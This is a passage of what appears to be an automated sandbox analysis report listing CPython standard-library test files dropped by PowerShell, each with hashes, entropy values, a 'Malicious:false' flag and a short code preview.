                                                                                                                                                                                                              SSDEEP:192:yvrtRdT+tChARX25HWHAeDtByP38KV5EgK92aM3OkOu9wlL44QpOQQFrR9stbxoF:yDBi44w5NYFJ2kDMGZB59xhfLSCCxoZ
                                                                                                                                                                                                              MD5:F74FDBE97C74D075668468C2FF051D32
                                                                                                                                                                                                              SHA1:C8F208CF5C1891A71F7BEA421103D1DB17E10509
                                                                                                                                                                                                              SHA-256:EA3EAB59E10FE90A0DF07CDB978BFDC7013752878D130EEA072BB916C4A559B7
                                                                                                                                                                                                              SHA-512:7471DA4BD1EEE29B2FD7A2848361394B6FCB992CFA7683ECD1DA28F88CE3C11C70C1061FF870B0A7D2D8E7D7BF20DFCE9DA4F8A4BE23E392E503F8E7A951D1CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Tests for ast.unparse."""....import unittest..import test.support..import pathlib..import random..import tokenize..import ast..from test.support.ast_helper import ASTTestMixin......def read_pyfile(filename):.. """Read and return the contents of a Python source file (as a.. string), taking into account the file encoding.""".. with tokenize.open(filename) as stream:.. return stream.read()......for_else = """\..def f():.. for x in range(10):.. break.. else:.. y = 2.. z = 3.."""....while_else = """\..def g():.. while True:.. break.. else:.. y = 2.. z = 3.."""....relative_import = """\..from . import fred..from .. import barney..from .australia import shrimp as prawns.."""....nonlocal_ex = """\..def f():.. x = 1.. def g():.. nonlocal x.. x = 2.. y = 7.. def h():.. nonlocal x, y.."""....# also acts as test for 'except ... as ...'..raise_from = """\..try:.. 1 / 0..except ZeroDivisi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):73554
                                                                                                                                                                                                              Entropy (8bit):4.722886588256466
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:Ba59dRkRDMr+wJgJVjf3ZFAvMK3TBhI3KRP:Ba59dRkRgr+wJgjjPgB3TBhIM
                                                                                                                                                                                                              MD5:67FD4ABB2E67C07A659E95055CAB6C3B
                                                                                                                                                                                                              SHA1:2CF25D69A1863535D34C0A432092D4D45A3EF89B
                                                                                                                                                                                                              SHA-256:98A26E06F3FF53BFD29F84B7DD4CF5EAB81D05052D5AEE680FE41DA648E59EC4
                                                                                                                                                                                                              SHA-512:0EC7E01CC7A9C6C9DFE0790E767081556E291F62573B17DAF0EDD9CDAFE2637E0210439B42B2ECE6D610D2D77520DAE86B7502ED2BC1E379D66393151ECC1A48
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Regression tests for what was in Python 2's "urllib" module"""....import urllib.parse..import urllib.request..import urllib.error..import http.client..import email.message..import io..import unittest..from unittest.mock import patch..from test import support..from test.support import os_helper..from test.support import socket_helper..from test.support import warnings_helper..import os..try:.. import ssl..except ImportError:.. ssl = None..import sys..import tempfile..from nturl2path import url2pathname, pathname2url....from base64 import b64encode..import collections......if not socket_helper.has_gethostname:.. raise unittest.SkipTest("test requires gethostname()")......def hexescape(char):.. """Escape char as RFC 2396 specifies""".. hex_repr = hex(ord(char))[2:].upper().. if len(hex_repr) == 1:.. hex_repr = "0%s" % hex_repr.. return "%" + hex_repr....# Shortcut for testing FancyURLopener.._urlopener = None......def urlopen(url, data=None, proxies=None):..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):83405
                                                                                                                                                                                                              Entropy (8bit):4.653907370195215
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:2IA3P+G1pTXaKKi9ItC1nrGiB17SCryI7XNMY7mYTiFK:23aKKi9IolGifSSyymYTiFK
                                                                                                                                                                                                              MD5:BBCB20F008BD74479396CD3D4242ADD6
                                                                                                                                                                                                              SHA1:84D744DF0FDCA9B091AD67A53815DD2878391ABF
                                                                                                                                                                                                              SHA-256:E39AB24618885E1902BD9FE134440AD5471A94EF4FD0245AD2990B6EE980F918
                                                                                                                                                                                                              SHA-512:E7F8CDFCEF6CBED7498C30FE8B9425DCDE7469DA51DF5EAA661869E23310A3F0F8E19CB2D3A4A9B72CCD6855A2F355E1485ED2A17B3716EF2B076EC36EE06268
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest..from test import support..from test.support import os_helper..from test.support import warnings_helper..from test import test_urllib..from unittest import mock....import os..import io..import socket..import array..import sys..import tempfile..import subprocess....import urllib.request..# The proxy bypass method imported below has logic specific to the OSX..# proxy config data structure but is testable on all platforms...from urllib.request import (Request, OpenerDirector, HTTPBasicAuthHandler,.. HTTPPasswordMgrWithPriorAuth, _parse_proxy,.. _proxy_bypass_macosx_sysconf,.. AbstractDigestAuthHandler)..from urllib.parse import urlparse..import urllib.error..import http.client....support.requires_working_socket(module=True)....# XXX..# Request..# CacheFTPHandler (hard to write)..# parse_keqv_list, parse_http_list, HTTPDigestAuthHandler......class TrivialTests(unittest.TestCase):.... def tes
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):26903
                                                                                                                                                                                                              Entropy (8bit):4.623608911189614
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:DU+RXs00duB4djEDFTxapmkWauK4/8yyR7Fcn/XvU:g+RcZduOjEhtaEvixc/s
                                                                                                                                                                                                              MD5:33DE8BA4E950486A8164A4A3FC3B6EC1
                                                                                                                                                                                                              SHA1:B512689D1AB8977F6CD0714952DB9772197F5CC8
                                                                                                                                                                                                              SHA-256:AED7E1F395537D7BEED9BB241ACAA29159CA031F9434AF6208BEF6CB9719C7D7
                                                                                                                                                                                                              SHA-512:E11FD16F70CE44C7A457803C16B3F805411BA0F0739490DCE2146A503D4D7818826A47750A29583BC42057FE3310A86886CE7615DEE915A1D507E42A48E3F406
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import base64..import os..import email..import urllib.parse..import urllib.request..import http.server..import threading..import unittest..import hashlib....from test import support..from test.support import hashlib_helper..from test.support import threading_helper..from test.support import warnings_helper....try:.. import ssl..except ImportError:.. ssl = None....support.requires_working_socket(module=True)....here = os.path.dirname(__file__)..# Self-signed cert file for 'localhost'..CERT_localhost = os.path.join(here, 'certdata', 'keycert.pem')..# Self-signed cert file for 'fakehostname'..CERT_fakehostname = os.path.join(here, 'certdata', 'keycert2.pem')......# Loopback http server infrastructure....class LoopbackHttpServer(http.server.HTTPServer):.. """HTTP server w/ a few modifications that make it useful for.. loopback testing purposes... """.... def __init__(self, server_address, RequestHandlerClass):.. http.server.HTTPServer.__init__(self,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14672
                                                                                                                                                                                                              Entropy (8bit):4.5063287709530035
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:wB+xlAD3CaB5/FJ9bt0rqhdESIMyJnsnunFD1VYfTv4rsQimIiuK53A:wB+/ADHZ+doiFTlbXnq
                                                                                                                                                                                                              MD5:C760C677E05B43620B4941DAE353644F
                                                                                                                                                                                                              SHA1:60D1069E33F866557E4FF55472A4B8DC6A880F3D
                                                                                                                                                                                                              SHA-256:DB115EE7D9C8DB8F7D25A1F000DCF751EF46FA15F20356CE1E5D0135DD8CB5E0
                                                                                                                                                                                                              SHA-512:47D76389499E5D74974372225FE1C307C43E1F2ECC969F439491C865949D5167CE82D10A4C647F12085099771D1F7C2F5A0CD72D6267184DF27BDC6D18A44C0B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import errno..import unittest..from test import support..from test.support import os_helper..from test.support import socket_helper..from test.support import ResourceDenied..from test.test_urllib2 import sanepathname2url....import os..import socket..import urllib.error..import urllib.request..import sys....support.requires("network")......def _retry_thrice(func, exc, *args, **kwargs):.. for i in range(3):.. try:.. return func(*args, **kwargs).. except exc as e:.. last_exc = e.. continue.. raise last_exc....def _wrap_with_retry_thrice(func, exc):.. def wrapped(*args, **kwargs):.. return _retry_thrice(func, exc, *args, **kwargs).. return wrapped....# Connecting to remote hosts is flaky. Make it more robust by retrying..# the connection several times..._urlopen_with_retry = _wrap_with_retry_thrice(urllib.request.urlopen,.. urllib.error.URLError)......class TransientResource(obje
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2112
                                                                                                                                                                                                              Entropy (8bit):4.467175297745975
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:enh03+KtArHLh//EfiF1ZxNRzSOnaJvfBIga1:Shq+pBMqFnb50Igy
                                                                                                                                                                                                              MD5:8915C609BB6CF83EAF7A0CE74D03A0FA
                                                                                                                                                                                                              SHA1:F145789314772D4FCA0B3C9B4939B02126E5E214
                                                                                                                                                                                                              SHA-256:AA4513F749523443FBF25D9DA212291BCF9C1294D3532A9395B9C872EDA743AA
                                                                                                                                                                                                              SHA-512:CA4BEEA8671B092DB865E8F2F00FD7F366FDF832D44BDD70DC1C3302601DFED8FB10E5598279C79BC0549AF5F8FD4B34E5396A6BA10827799168EB92FCE44A48
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Unit tests for code in urllib.response."""....import socket..import tempfile..import urllib.response..import unittest..from test import support....if support.is_wasi:.. raise unittest.SkipTest("Cannot create socket on WASI")......class TestResponse(unittest.TestCase):.... def setUp(self):.. self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM).. self.fp = self.sock.makefile('rb').. self.test_headers = {"Host": "www.python.org",.. "Connection": "close"}.... def test_with(self):.. addbase = urllib.response.addbase(self.fp).... self.assertIsInstance(addbase, tempfile._TemporaryFileWrapper).... def f():.. with addbase as spam:.. pass.. self.assertFalse(self.fp.closed).. f().. self.assertTrue(self.fp.closed).. self.assertRaises(ValueError, f).... def test_addclosehook(self):.. closehook_called = False.... def closehook():..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9866
                                                                                                                                                                                                              Entropy (8bit):4.479665556430791
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:FWr5r5hWfh/xQKQ9WHNQCHgHmuRR/tVS9wxD7bnhpCtOImmbQCLhbMfosYtX/7aR:eB5h6hj5utVSCjHCAImmD9KYtP7BA
                                                                                                                                                                                                              MD5:36542D396A2533DB6A7437983FA7C1E1
                                                                                                                                                                                                              SHA1:3DD50A9E78ACEAE77EE45391BAD79112FF821074
                                                                                                                                                                                                              SHA-256:97BB5DDDE8A2E998A67FC27291BD3E58F58F7AC6136D1635D4BD847B1DF7B06B
                                                                                                                                                                                                              SHA-512:47D5F42023EBD6E85925C100855D3B0B9D3EEA4320232142D7931D5CC01A8CE08B51AE3875A1779DC94AB7061BBB433A5FB3C42BDF8544E29006FCDE370DDE71
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest..from test import support..from test.support import os_helper..from test.support import socket_helper....import contextlib..import socket..import urllib.parse..import urllib.request..import os..import email.message..import time......support.requires('network')......class URLTimeoutTest(unittest.TestCase):.. # XXX this test doesn't seem to test anything useful..... def setUp(self):.. socket.setdefaulttimeout(support.INTERNET_TIMEOUT).... def tearDown(self):.. socket.setdefaulttimeout(None).... def testURLread(self):.. # clear _opener global variable.. self.addCleanup(urllib.request.urlcleanup).... domain = urllib.parse.urlparse(support.TEST_HTTP_URL).netloc.. with socket_helper.transient_internet(domain):.. f = urllib.request.urlopen(support.TEST_HTTP_URL).. f.read()......class urlopenNetworkTests(unittest.TestCase):.. """Tests urllib.request.urlopen using the network..... These tests are n
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):74324
                                                                                                                                                                                                              Entropy (8bit):4.925397905017952
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:kyUzHBD2HlUEmrOqQesXlP60FA/pfRNDyh9TtU7/3SZurCSysCU8JTR:kyUmUEgQesXly0FHZgynJTR
                                                                                                                                                                                                              MD5:C956C88F123EAA4EF7CE8FC1CE5E3FE7
                                                                                                                                                                                                              SHA1:51F1A6E541726640E9C6DF1D8C30C9EC31AD0A70
                                                                                                                                                                                                              SHA-256:D83B8848A019A7FDB85FA218A72DE901168990E998F1A69AD33101B1459BF96B
                                                                                                                                                                                                              SHA-512:9CE790A38660966EFC8D9764CE89AA965ABBB747570EF830EB1E6FC0D6C56085D10FF601EAADFEBC0BC8E322978D9553DA78B1D3DB7D1805D153E8A50D8E3141
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import sys..import unicodedata..import unittest..import urllib.parse....RFC1808_BASE = "http://a/b/c/d;p?q#f"..RFC2396_BASE = "http://a/b/c/d;p?q"..RFC3986_BASE = 'http://a/b/c/d;p?q'..SIMPLE_BASE = 'http://a/b/c/d'....# Each parse_qsl testcase is a two-tuple that contains..# a string with the query and a list with the expected result.....parse_qsl_test_cases = [.. ("", []),.. ("&", []),.. ("&&", []),.. ("=", [('', '')]),.. ("=a", [('', 'a')]),.. ("a", [('a', '')]),.. ("a=", [('a', '')]),.. ("&a=b", [('a', 'b')]),.. ("a=a+b&b=b+c", [('a', 'a b'), ('b', 'b c')]),.. ("a=1&a=2", [('a', '1'), ('a', '2')]),.. (b"", []),.. (b"&", []),.. (b"&&", []),.. (b"=", [(b'', b'')]),.. (b"=a", [(b'', b'a')]),.. (b"a", [(b'a', b'')]),.. (b"a=", [(b'a', b'')]),.. (b"&a=b", [(b'a', b'b')]),.. (b"a=a+b&b=b+c", [(b'a', b'a b'), (b'b', b'b c')]),.. (b"a=1&a=2", [(b'a', b'1'), (b'a', b'2')]),.. (";a=b", [(';a', 'b')]),.. ("a=a+b;b=b+c", [('a',
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7963
                                                                                                                                                                                                              Entropy (8bit):4.573807001346897
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:DblUi1Xg4d2AXLHd9HhiCflPpfPmZfvmwTFcft/nwvqYwLybzlo9i7GCXrA:m4d2ArzflRGxvXTst/nwvqrybzloQA
                                                                                                                                                                                                              MD5:EF48544E2F1DE6456B4D64273A801ABE
                                                                                                                                                                                                              SHA1:6F116A6E06E2DCA102DC89E1233E306F7049310E
                                                                                                                                                                                                              SHA-256:F2C2E07217CF5228493AEAA51709684B24A0051B74D049E53CD292CC15F45DB3
                                                                                                                                                                                                              SHA-512:6D0D497287DAB629DCF6219068A121E496F41DCC06AE14E51E92184A570B371B31E3E3CDFA17599DFECA5918F68E585F4F36255421BD1803CC439640348891FE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Check every path through every method of UserDict....from test import mapping_tests..import unittest..import collections....d0 = {}..d1 = {"one": 1}..d2 = {"one": 1, "two": 2}..d3 = {"one": 1, "two": 3, "three": 5}..d4 = {"one": None, "two": None}..d5 = {"one": 1, "two": 1}....class UserDictTest(mapping_tests.TestHashMappingProtocol):.. type2test = collections.UserDict.... def test_all(self):.. # Test constructors.. u = collections.UserDict().. u0 = collections.UserDict(d0).. u1 = collections.UserDict(d1).. u2 = collections.UserDict(d2).... uu = collections.UserDict(u).. uu0 = collections.UserDict(u0).. uu1 = collections.UserDict(u1).. uu2 = collections.UserDict(u2).... # keyword arg constructor.. self.assertEqual(collections.UserDict(one=1, two=2), d2).. # item sequence constructor.. self.assertEqual(collections.UserDict([('one',1), ('two',2)]), d2).. self.assertEqual(collections.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2085
                                                                                                                                                                                                              Entropy (8bit):4.5473781365725525
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:wFQZTAc5XlJglN6rrqg96CXlJXlvUBWO/XlaPA:PZTFCGXNXAL/QPA
                                                                                                                                                                                                              MD5:8BF0F6B72039327236809D140FE2C2E7
                                                                                                                                                                                                              SHA1:51CDCA9F4424182DF7D6BC436EC148EEE9AA917D
                                                                                                                                                                                                              SHA-256:E72D4DE50BA3F8C3EE5B45183BDDF304C5AA74593776E33BBB8301D9D0C2DB84
                                                                                                                                                                                                              SHA-512:65891829049646F7165EEFA42BC6FD14DDFA7B06395ACE912DAF873F552A775C1A1482712C632F6B0C359CEB7F66BF4AEDEAC4EC54166F06D56C9B957A50EC34
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Check every path through every method of UserList....from collections import UserList..from test import list_tests..import unittest....class UserListTest(list_tests.CommonTest):.. type2test = UserList.... def test_getslice(self):.. super().test_getslice().. l = [0, 1, 2, 3, 4].. u = self.type2test(l).. for i in range(-3, 6):.. self.assertEqual(u[:i], l[:i]).. self.assertEqual(u[i:], l[i:]).. for j in range(-3, 6):.. self.assertEqual(u[i:j], l[i:j]).... def test_slice_type(self):.. l = [0, 1, 2, 3, 4].. u = UserList(l).. self.assertIsInstance(u[:], u.__class__).. self.assertEqual(u[:],u).... def test_add_specials(self):.. u = UserList("spam").. u2 = u + "eggs".. self.assertEqual(u2, list("spameggs")).... def test_radd_specials(self):.. u = UserList("eggs").. u2 = "spam" + u.. self.assertEqual(u2, list("spameggs")).. u2
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2651
                                                                                                                                                                                                              Entropy (8bit):4.688258359893242
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:6VhVGXBFQ3j4hD2lDkJ5yJ0P3RkJioPIyZ5uzE4RNmyp5uzE4RwA:qhqBFvZQS0IyZ5X4Oyp5v42A
                                                                                                                                                                                                              MD5:2ECF5DD63853A2FCBBEE4901EC191FFF
                                                                                                                                                                                                              SHA1:7C50B183E207A1AEC97968C68E2099427B047693
                                                                                                                                                                                                              SHA-256:6E6A4298043CB1CFEFE160E3F279480335A76965A8379A6D20DBD471A06F6A4D
                                                                                                                                                                                                              SHA-512:B239459417FCD21AB506A2BEEE633D13CD84180FE03CF12BE0E0FC65DC256AEBA7C96CA8944AD553C36EB99C8668DBF94B104AC13607879AE2C99092FECD52DF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# UserString is a wrapper around the native builtin string type...# UserString instances should behave similar to builtin string objects.....import unittest..from test import string_tests....from collections import UserString....class UserStringTest(.. string_tests.CommonTest,.. string_tests.MixinStrUnicodeUserStringTest,.. unittest.TestCase.. ):.... type2test = UserString.... # Overwrite the three testing methods, because UserString.. # can't cope with arguments propagated to UserString.. # (and we don't test with subclasses).. def checkequal(self, result, object, methodname, *args, **kwargs):.. result = self.fixtype(result).. object = self.fixtype(object).. # we don't fix the arguments, because UserString can't cope with it.. realresult = getattr(object, methodname)(*args, **kwargs).. self.assertEqual(.. result,.. realresult.. ).... def checkraises(self, exc, obj, methodname, *args, expected
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10841
                                                                                                                                                                                                              Entropy (8bit):4.752681299289326
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:eL3eFiifgfVfr6n8nTTCtTST5nr1nZMmuEHPzLfvfzWV+LxPA:eL3elUtmoTTCtTSTN18KjXzW5
                                                                                                                                                                                                              MD5:B6476F69DF736F72E1D77A85AA5A381B
                                                                                                                                                                                                              SHA1:5A5886EEC6216ED85E3FEB878C8421E8365514E2
                                                                                                                                                                                                              SHA-256:B132220E516F02011BE1D12B968101D89125D2363B2E1CBE2B809482A8EA458B
                                                                                                                                                                                                              SHA-512:E90FF16EFB76C6D21509C44C774EF62BE689BF66F9A0FC5ED4B378F3AAB9DB185F4C9FFA8A86913F73401B7556A8A62CA8CBE82706F9F31F5B0DDA8311E07320
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""..Test the implementation of the PEP 540: the UTF-8 Mode..."""....import locale..import subprocess..import sys..import textwrap..import unittest..from test import support..from test.support.script_helper import assert_python_ok, assert_python_failure..from test.support import os_helper, MS_WINDOWS......POSIX_LOCALES = ('C', 'POSIX')..VXWORKS = (sys.platform == "vxworks")....class UTF8ModeTests(unittest.TestCase):.. DEFAULT_ENV = {.. 'PYTHONUTF8': '',.. 'PYTHONLEGACYWINDOWSFSENCODING': '',.. 'PYTHONCOERCECLOCALE': '0',.. }.... def posix_locale(self):.. loc = locale.setlocale(locale.LC_CTYPE, None).. return (loc in POSIX_LOCALES).... def get_output(self, *args, failure=False, **kw):.. kw = dict(self.DEFAULT_ENV, **kw).. if failure:.. out = assert_python_failure(*args, **kw).. out = out[2].. else:.. out = assert_python_ok(*args, **kw).. out = out[1].. return out.decode
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1218
                                                                                                                                                                                                              Entropy (8bit):4.730587645977066
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:qfcw6kQ/0mOXYquEhROOiCqR+nogscm/zEf9npe:216kEOIahgTqogLuzU9nA
                                                                                                                                                                                                              MD5:9364BE1B5DE90B7932C1AD8E84F30877
                                                                                                                                                                                                              SHA1:5EE050D1747D05C49F6C45EE1C5C072816A120ED
                                                                                                                                                                                                              SHA-256:9A2697B66E9CE7BD9EA3397838152F0AE8F5DD10A6270153970493980CEE84B5
                                                                                                                                                                                                              SHA-512:6C87354E473B6C6827AC2517D7C78750ADD10A36DBE751B1E95F7F215A5669FE3DED632D9FC3F4C1E38D17C281A9E18726A35E0858C261C69CE78BF4EE9829EA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# This file is marked as binary in the CVS, to prevent MacCVS from recoding it.....import unittest....class PEP3120Test(unittest.TestCase):.... def test_pep3120(self):.. self.assertEqual(.. ".....".encode("utf-8"),.. b'\xd0\x9f\xd0\xb8\xd1\x82\xd0\xbe\xd0\xbd'.. ).. self.assertEqual(.. "\.".encode("utf-8"),.. b'\\\xd0\x9f'.. ).... def test_badsyntax(self):.. try:.. import test.badsyntax_pep3120.. except SyntaxError as msg:.. msg = str(msg).lower().. self.assertTrue('utf-8' in msg).. else:.. self.fail("expected exception didn't occur")......class BuiltinCompileTests(unittest.TestCase):.... # Issue 3574... def test_latin1(self):.. # Allow compile() to read Latin-1 source... source_code = '# coding: Latin-1\nu = "."\n'.encode("Latin-1").. try:.. code = compile(source_code, '<dummy>', 'exec').. exc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9703
                                                                                                                                                                                                              Entropy (8bit):4.670986190065468
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:xrKsc/cA7kSlF2qH3xOZx/OwD37YroP9Jeugs9yMMu/0gjAZ7QDZQVSeY1KQvoiW:ZKsc5roHxjDcrkJebsIRuVMZiC/Z
                                                                                                                                                                                                              MD5:A1F7CB1590E890A1576081A597353F38
                                                                                                                                                                                                              SHA1:6AD38F8F4D71D4B9E6B3D2EF52309A9AE844A7BA
                                                                                                                                                                                                              SHA-256:15CEC1E7B641452C81B512EAD1594DA97309DE6E8EAF8B2B61E597587272CF78
                                                                                                                                                                                                              SHA-512:7B72E9E0862780C3D6397F0EE7324A613DA5BA716B26B4AB4BE44A6C0AD03E27869C684A19895A7716931EF85091EF7956D6C2B1D98BB09B74A06D7E8433DCB3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""..Tests for uu module...Nick Mathewson.."""....import unittest..from test.support import os_helper, warnings_helper....uu = warnings_helper.import_deprecated("uu")....import os..import stat..import sys..import io....plaintext = b"The symbols on top of your keyboard are !@#$%^&*()_+|~\n"....encodedtext = b"""\..M5&AE('-Y;6)O;',@;VX@=&]P(&]F('EO=7(@:V5Y8F]A<F0@87)E("% (R0E..*7B8J*"E?*WQ^"@ """....# Stolen from io.py..class FakeIO(io.TextIOWrapper):.. """Text I/O implementation using an in-memory buffer..... Can be a used as a drop-in replacement for sys.stdin and sys.stdout... """.... # XXX This is really slow, but fully functional.... def __init__(self, initial_value="", encoding="utf-8",.. errors="strict", newline="\n"):.. super(FakeIO, self).__init__(io.BytesIO(),.. encoding=encoding,.. errors=errors,.. newline=newline).. self._en
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):46312
                                                                                                                                                                                                              Entropy (8bit):4.903127254479871
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:epfHnPo/F37tjnRJ0dIlC9s+0Yxb1RFtQl437s+ABJ7C/VsLUBuDNvv:epfqN0Ilz+0MbxsLqUNX
                                                                                                                                                                                                              MD5:0C7707D2D9DD39BAC4A706FD7CB43BEC
                                                                                                                                                                                                              SHA1:D7338CB904EF0044CF6C1D0FFD7579EBEBAE8658
                                                                                                                                                                                                              SHA-256:510AC132E4D56E6206C8205B62454D06C61CFEBDC07A1BA1D702604013D99876
                                                                                                                                                                                                              SHA-512:A4A3882352F1DDA80E6BFB25CDA515C47F4AB0C9A39FB6BEE9663641CB7EE8DD94E1FB56D8A6233664288496CC7A7E8E4C21BDF17804D5A781871AD678077FB1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest..from test import support..from test.support import import_helper..import builtins..import contextlib..import copy..import enum..import io..import os..import pickle..import sys..import weakref..from unittest import mock....py_uuid = import_helper.import_fresh_module('uuid', blocked=['_uuid'])..c_uuid = import_helper.import_fresh_module('uuid', fresh=['_uuid'])....def importable(name):.. try:.. __import__(name).. return True.. except:.. return False......def mock_get_command_stdout(data):.. def get_command_stdout(command, args):.. return io.BytesIO(data.encode()).. return get_command_stdout......class BaseTestUUID:.. uuid = None.... def test_safe_uuid_enum(self):.. class CheckedSafeUUID(enum.Enum):.. safe = 0.. unsafe = -1.. unknown = None.. enum._test_simple_enum(CheckedSafeUUID, py_uuid.SafeUUID).... def test_UUID(self):.. equal = self.assertEqual.. ascending =
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):33929
                                                                                                                                                                                                              Entropy (8bit):4.536851506182281
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:eg0l5rf8GYzifNpDCmYDr85XMBcTPO89N486p2ScPCDgbw2+OkDmn4ZQ:10HuzifNpDCmYDr85XMBcTPO89N486pa
                                                                                                                                                                                                              MD5:FC0EDB7A4EC8C0967ED75557260CC1C6
                                                                                                                                                                                                              SHA1:E457997EC8BA046938F5EB100D3C80A08CB4300F
                                                                                                                                                                                                              SHA-256:16EE28234DDF54A369894FB76C1E0CADE605801AE4778611E7B356F0DA7A36AD
                                                                                                                                                                                                              SHA-512:6DCEEB28CB89B2EEA23F467D8717F7B2D09DFA8A6B4F4A9A6269A3B478DDB28B51D11823CC3A9FF54151C94130D9FCA9AE57CB5732F330DD9D86BADD3861F55E
                                                                                                                                                                                                              Malicious:false
